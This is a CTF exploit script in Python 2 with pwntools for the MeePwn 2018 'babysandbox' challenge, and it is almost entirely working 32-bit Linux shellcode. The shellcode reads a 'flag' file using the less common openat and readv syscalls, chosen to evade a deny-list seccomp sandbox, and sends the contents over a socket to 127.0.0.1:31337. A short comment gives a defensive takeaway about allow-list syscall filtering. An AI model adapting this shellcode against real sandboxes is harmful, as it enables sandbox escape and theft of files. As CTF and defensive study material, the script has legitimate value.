MeePwn CTF 2018 Quals babysandbox
#!/usr/bin/env python
# Exploit for the MeePwn CTF 2018 Quals "babysandbox" challenge: assembles
# 32-bit Linux shellcode with pwntools, pads it to a fixed 0x100 bytes and
# prints it base64-encoded for delivery to the challenge.
#
# Python 2 script (print statement, str.encode('base64')): pwntools asm()
# returns a str here, so the '\x90' padding and the base64 step operate on
# bytes-as-str.  The assembly below is a string literal handed to asm(); its
# `//` lines are assembler comments, not Python comments, and are part of
# the literal.
#
# What the shellcode does (from the syscall numbers used): openat (eax=0x127,
# ebx=-100 is AT_FDCWD, path "flag" built from push 0x67616c66 plus a NUL),
# readv (eax=0x91) the file into the stack, socket()/connect() via socketcall
# (eax=102) to 127.0.0.1:31337, then writev (eax=0x92) the buffer to the
# socket.
#
# NOTE(review): the vectored/at-variants are used instead of the plainer
# open/read/write -- presumably because the sandbox's syscall filter only
# covers the common names.  The defensive takeaway is that a seccomp policy
# should be an allow-list of the syscalls a program needs, not a deny-list of
# the obvious ones, and that network syscalls (socketcall here) should be
# denied outright when the sandboxed program has no reason to use them.
from pwn import *
# Target is 32-bit Linux: selects the i386 assembler and the int 0x80 ABI.
context(os='linux', arch='i386')
shellcode = '''
// openat
xor eax, eax
push eax
push 0x67616c66
mov ebx, -100
mov ecx, esp
xor edx, edx
xor esi, esi
mov ax, 0x127
int 0x80
// readv
mov ebx, eax
mov ax, 0x100
push eax
mov ecx, esp
inc ecx
inc ecx
inc ecx
inc ecx
push ecx
mov ecx, esp
xor edx, edx
inc edx
xor eax, eax
mov al, 0x91
int 0x80
// socket(2, 1, 6);
xor eax, eax
xor ebx, ebx
xor ecx, ecx
push ecx
mov cl, 6
push ecx
mov cl, 1
push ecx
mov cl, 2
push ecx
mov ecx, esp
mov bl, 1
mov al, 102
int 0x80
//connect(sock, sockaddr, 16)
mov edx, eax
xor eax, eax
xor ecx, ecx
push ecx
push ecx
push 0x0100007f // 127.0.0.1
pushw 0x697a // 31337
mov cl, 2
pushw cx
mov edi, esp
mov bl, 16
push ebx
push edi
push edx
mov ecx, esp
mov bl, 3
mov al, 102
int 0x80
// writev
mov ebx, edx
lea ecx, [esp+0x2c]
xor eax, eax
mov dl, 1
mov al, 0x92
int 0x80
'''
# Assemble to raw machine code (a str under Python 2).
payload = asm(shellcode)
# Pad the tail with NOPs (0x90) up to 0x100 bytes.  ljust never truncates,
# so a payload longer than 0x100 bytes would be emitted unchanged.
payload = payload.ljust(0x100, '\x90')
# Emit base64 (Python 2 codec: inserts a newline every 76 characters).
print payload.encode('base64')